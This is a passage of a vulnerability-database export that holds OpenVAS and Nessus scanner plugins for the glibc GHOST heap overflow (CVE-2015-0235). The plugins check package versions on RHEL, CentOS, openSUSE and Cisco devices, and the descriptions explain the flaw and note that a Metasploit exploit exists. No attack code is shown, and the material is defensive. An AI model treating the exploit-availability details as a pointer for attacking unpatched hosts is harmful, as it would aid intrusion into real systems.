06:10:36 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Update for glibc RHSA-2015:0090-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"glibc on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:0090-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-January/msg00031.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.5~123.el5_11.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.5~123.el5_11.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.5~123.el5_11.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", rpm:\"glibc-debuginfo-common~2.5~123.el5_11.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.5~123.el5_11.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.5~123.el5_11.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.5~123.el5_11.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.5~123.el5_11.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:02", "bulletinFamily": "scanner", "description": "Check the version of glibc", "modified": "2019-03-08T00:00:00", "published": "2015-01-28T00:00:00", "id": "OPENVAS:1361412562310882108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882108", "title": "CentOS Update for glibc CESA-2015:0092 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for glibc CESA-2015:0092 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882108\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 06:10:49 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2015-0235\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for glibc CESA-2015:0092 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of glibc\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The glibc packages provide the standard C libraries (libc), POSIX thread\nlibraries (libpthread), standard math libraries (libm), and the Name\nServer Caching Daemon (nscd) used by multiple programs on the system.\nWithout these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname()\nand gethostbyname2() glibc function calls. A remote attacker able to make\nan application call either of these functions could use this flaw to\nexecute arbitrary code with the permissions of the user running the\napplication. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_tag(name:\"affected\", value:\"glibc on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:0092\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-January/020908.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.el7_0.5\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-02-21T01:23:31", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the Cisco TelePresence Conductor remote device is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "modified": "2018-11-15T00:00:00", "id": "CISCO_TELEPRESENCE_CONDUCTOR_CSCUS69523.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81407", "published": "2015-02-18T00:00:00", "title": "Cisco TelePresence Conductor GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81407);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:20\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69523\");\n script_xref(name:\"CISCO-SA\",value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco TelePresence Conductor GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)\");\n script_summary(english:\"Checks the software version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Cisco TelePresence Conductor device is affected by a buffer\noverflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cisco TelePresence\nConductor remote device is affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69523\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 2.4 / 3.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_conductor\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_telepresence_conductor_detect.nbin\");\n script_require_keys(\"Host/Cisco_TelePresence_Conductor/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Conductor\";\nversion = get_kb_item_or_exit(\"Host/Cisco_TelePresence_Conductor/Version\");\n\nif (\n version =~ \"^1(\\.|$)\" ||\n (version =~ \"^2\\.[0-3](\\.|$)\")\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 2.4 / 3.0' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:26", "bulletinFamily": "scanner", "description": "This update for glibc fixes the following security issue :\n\nCVE-2015-0235: A vulnerability was found and fixed in the GNU C Library, specifically in the function gethostbyname(), that could lead to a local or remote buffer overflow. (bsc#913646)", "modified": "2018-11-10T00:00:00", "id": "OPENSUSE-2015-84.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81136", "published": "2015-02-03T00:00:00", "title": "openSUSE Security Update : glibc (openSUSE-SU-2015:0184-1) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-84.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81136);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/10 11:50:02\");\n\n script_cve_id(\"CVE-2015-0235\");\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-SU-2015:0184-1) (GHOST)\");\n script_summary(english:\"Check for the openSUSE-2015-84 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for glibc fixes the following security issue :\n\nCVE-2015-0235: A vulnerability was found and fixed in the GNU C\nLibrary, specifically in the function gethostbyname(), that could lead\nto a local or remote buffer overflow. (bsc#913646)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-02/msg00001.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debugsource-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-static-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-html-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-i18ndata-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-info-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-profile-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debugsource-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-debuginfo-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.17-4.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.17-4.17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc-utils / glibc-utils-32bit / glibc-utils-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:23:23", "bulletinFamily": "scanner", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2015-0092.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81026", "published": "2015-01-28T00:00:00", "title": "CentOS 6 / 7 : glibc (CESA-2015:0092) (GHOST)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0092 and \n# CentOS Errata and Security Advisory 2015:0092 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81026);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/10 11:49:31\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"RHSA\", value:\"2015:0092\");\n\n script_name(english:\"CentOS 6 / 7 : glibc (CESA-2015:0092) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020907.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6572e379\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-January/020908.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cecc8718\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-common-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-devel-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-headers-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"glibc-static-2.12-1.149.el6_6.5\")) flag++;\nif (rpm_check(release:\"CentOS-6\", 